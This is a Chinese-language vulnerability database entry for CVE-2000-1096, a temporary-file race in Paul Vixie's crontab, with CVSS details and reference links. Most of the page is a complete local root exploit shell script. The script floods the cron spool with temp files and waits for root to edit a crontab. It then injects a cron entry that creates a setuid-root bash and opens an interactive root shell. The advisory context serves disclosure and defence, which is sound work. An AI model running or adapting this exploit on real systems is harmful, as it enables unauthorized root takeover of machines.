CVE-2000-1096
CVSS3.7
发布时间 :2001-01-09 00:00:00
修订时间 :2008-09-10 15:06:36
NMCOE    

[原文]crontab by Paul Vixie uses predictable file names for a temporary file and does not properly ensure that the file is owned by the user executing the crontab -e command, which allows local users with write access to the crontab spool directory to execute arbitrary commands by creating world-writeable temporary files and modifying them while the victim is editing the file.


[CNNVD]Paul Vixie任意命令执行漏洞(CNNVD-200101-096)

        Paul Vixie的定时任务使用暂时文件的可预言文件名并且不能正确地确保文件被执行定时任务-e命令的用户所拥有,带有到定时任务线轴目录的写访问的本地用户可以通过在受害人编辑文件时创建全局可读暂时文件以及修改它们来执行任意命令。

- CVSS (基础分值)

CVSS分值: 3.7 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1096
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1096
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-096
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1960
(VENDOR_ADVISORY)  BID  1960
http://xforce.iss.net/xforce/xfdb/5543
(UNKNOWN)  XF  vixie-cron-execute-commands(5543)
http://archives.neohapsis.com/archives/bugtraq/2000-11/0237.html
(UNKNOWN)  BUGTRAQ  20001116 vixie cron...

- 漏洞信息

Paul Vixie任意命令执行漏洞
低危 未知
2001-01-09 00:00:00 2006-08-30 00:00:00
本地  
        Paul Vixie的定时任务使用暂时文件的可预言文件名并且不能正确地确保文件被执行定时任务-e命令的用户所拥有,带有到定时任务线轴目录的写访问的本地用户可以通过在受害人编辑文件时创建全局可读暂时文件以及修改它们来执行任意命令。

- 公告与补丁

        

- 漏洞信息 (203)

vixie-cron Local Root Exploit (EDBID:203)
linux local
2000-11-21 Verified
0 Michal Zalewski
N/A [点击下载]
#!/bin/sh

echo '.-------------------------------------------------------------------------.'
echo '| Marchew Hyperreal Industries ................... <marchew@dione.ids.pl> |'
echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |"
echo "\`--------------------------------- presents ------------------------------'"
echo
echo '  * another vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> *   '
echo
echo '.-------------------------------------------------------------------------.'
echo '| This time, it is somewhat more complicated. On some systems, it might   |'
echo '| require some tuning, to be slower, but resources-effective. It expects  |'
echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file"  |'
echo '| sooner or later, and spoofs the legitimate cron entry file with evil    |'
echo '| content, thus leading to account compromise (usually: root compromise). |'
echo "\`-------------------------------------------------------------------------'"
echo

CYCLES=32768
DESTUSER=root
SHOULDTOOK=60

VCRON="`strings /usr/bin/crontab 2>/dev/null|grep -i vixie`"

if [ "$VCRON" = "" ]; then
  echo "[-] Sorry, this box is not running vixie cron."
  echo
  exit 1
else
  echo "[+] Found Paul Vixie's /usr/bin/crontab utility."
fi


if [ -r /var/spool/cron ]; then
  echo "[+] This box has exploitable /var/spool/cron..."
else
  echo "[-] Sorry, this box is not vulnerable to this attack."
  echo
  exit 1
fi


if [ -u /usr/bin/crontab ]; then
  echo "[+] This box has setuid crontab utility..."
else
  echo "[-] Sorry, this box has no setuid crontab."
  echo
  exit 1
fi

cat >dowrite.c <<_EOF_
main() {
  lseek(1,0,0);
  write(1,"* * * * * /tmp/.rootcron\n\n",26);
  ftruncate(1,25);
}
_EOF_

echo "[+] Compiling helper application #1..."

gcc -o dowrite dowrite.c 

if [ ! -f dowrite ]; then
  echo "[-] Compilation failed."
  echo
  exit 1
fi

echo "[+] Application #1 compiled successfully."

echo "[+] Creating helper application #2..."

cat >/tmp/.rootcron <<_EOF_
#!/bin/sh

(
  chown root.root /tmp/.r00tcr0n
  chmod 6755 /tmp/.r00tcr0n
  rm -f /var/spool/cron/tmp.*
  crontab -r
) &>/dev/null

_EOF_

cat >root.c <<_EOF_
main() {
  setuid(0); setgid(0);
  unlink("/tmp/.r00tcr0n");
  execl("/bin/bash","bash","-i",0);
  perror("bash");
}
_EOF_

echo "[+] Compiling helper application #3..."

gcc -o /tmp/.r00tcr0n root.c

if [ ! -f /tmp/.r00tcr0n ]; then
  echo "[-] Compilation failed."
  echo
  exit 1
fi

echo "[+] Application #3 compiled successfully."


X=0


if [ ! "$1" = "noprep" ]; then

  echo "[*] Attack against user $DESTUSER, doing $CYCLES setup cycles..."
  echo "    Please be patient, setup might took some time; to skip it if"
  echo "    /var/spool/cron on this machine is already initialized, use"
  echo "    '$0 noprep'."

  PROB=$[CYCLES*100/32768]
  test "$PROB" -gt "100" && PROB=100

  echo "[+] This gives almost $PROB% probability of success on the first attempt."

  while [ "$X" -lt "$CYCLES" ]; do
    X=$[X+1]
    echo -ne "\r[?] Doing cycle $X of $CYCLES [$[X*100/CYCLES]% done]... "
    umask 0
    ( ( crontab /dev/urandom & usleep 1000; killall crontab ) & ) &>/dev/null 
  done

  sleep 3;killall -9 crontab &>/dev/null

  echo
  echo "[+] Setup complete, /var/spool/cron filled with junk tmp files."

  CNT=0

  echo "[*] Now, doing cleanup and counting the nodes..."

  for i in 1 2 3 4 5 6 7 8 9; do
    for j in /var/spool/cron/tmp.${i}*; do
      echo -n >$j
      echo -ne "\r[+] Node $CNT clean... "
      CNT=$[CNT+1]
    done
  done

  echo

  PROB=$[CNT*100/32768]

  echo "[+] Found $CNT nodes, approx. $PROB% chance..."

  if [ "$CNT" -lt "$[CYCLES*2/3]" ]; then
    echo "[-] Less than 66% of expected nodes were created. Try adjusting the exploit."
    echo
    exit 1
  fi

else

  echo "[?] Skipping /var/spool/cron initialization. Results might be unpredictable."

fi

echo "[+] Now I will wait for $DESTUSER to edit his crontab. Could take some time."

chmod 755 /tmp/.rootcron

while :; do
  sleep 1
  GOT="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep|cut -b10-15|head -1`"
  test "$GOT" = "" && continue
  GOT=`echo $GOT`
  echo "[+] Caught victim at pid $GOT..."
  if [ ! -f /var/spool/cron/tmp.$GOT ]; then
    echo "[-] DAMN! We have no node for this pid, bad luck..."
    continue
  fi
  echo '[+] Got this node :) Entering event wait loop...'
  export DESTUSER
  (
     G=blabla
     while [ ! "$G" = "" ]; do
       G="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep`"
     done
     sleep 1
     echo "[+] Bingo! It happened. Now writing our evil content..." 1>&2
     ./dowrite
  ) >/var/spool/cron/tmp.$GOT
  echo '* * * * * /bin/true' >.ctab
  echo "[+] Evil content written. Trying to rehash the daemon..."
  crontab .ctab
  crontab -r
  echo "[+] Entering event loop waiting for exploit to work..."
  while [ ! -u /tmp/.r00tcr0n ]; do
    sleep 1
  done
  rm -f .ctab dowrite dowrite.c /tmp/.rootcron root.c
  echo "[+] Calling the main code..."
  /tmp/.r00tcr0n
  echo "[*] Thank you for choosing Marchew Industries."
  echo
  exit 1
done  


# milw0rm.com [2000-11-21]
		

- 漏洞信息

1652
Vixie Cron /var/spool/cron Temporary Crontab File
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-11-16 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站